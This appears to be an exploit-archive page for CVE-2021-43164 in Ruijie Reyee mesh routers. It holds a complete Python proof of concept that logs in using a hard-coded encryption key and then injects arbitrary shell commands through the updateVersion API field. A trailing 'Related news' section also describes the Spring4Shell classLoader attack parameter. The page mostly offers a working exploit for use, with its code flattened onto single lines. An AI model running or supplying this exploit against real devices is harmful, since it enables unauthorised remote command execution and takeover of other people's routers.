Headline
Ruijie Reyee Mesh Router Remote Code Execution
Ruijie Reyee mesh routers with ReyeeOS version 1.55.1915 EW_3.0(1)B11P35 and EW_3.0(1)B11P55 suffer from a remote code execution vulnerability.
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)# Google Dork: None# Date: November 1, 2021# Exploit Author: Minh Khoa of VSEC# Vendor Homepage: https://ruijienetworks.com# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO# CVE: CVE-2021-43164#!/usr/bin/python3import osimport sysimport timeimport requestsimport jsondef enc(PASS): key = "RjYkhwzx$2018!" shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key) return os.popen(shell).read().strip()try: TARGET = sys.argv[1] USER = sys.argv[2] PASS = sys.argv[3] COMMAND = sys.argv[4]except Exception: print("CVE-2021-43164 PoC") print("Usage: python3 exploit.py <target> <user> <pass> <command>") print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'") sys.exit(1)endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)payload = { "method": "login", "params": { "username": USER, "password": enc(PASS), "encry": True, "time": int(time.time()), "limit": False } }r = requests.post(endpoint, json=payload)sid = json.loads(r.text)["data"]["sid"]endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)payload = { "method": "updateVersion", "params": { "jsonparam": "'; {} #".format(COMMAND) } }r = requests.post(endpoint, json=payload)print(r.text)Related news
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.
A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55 via the updateVersion function in /cgi-bin/luci/api/wireless.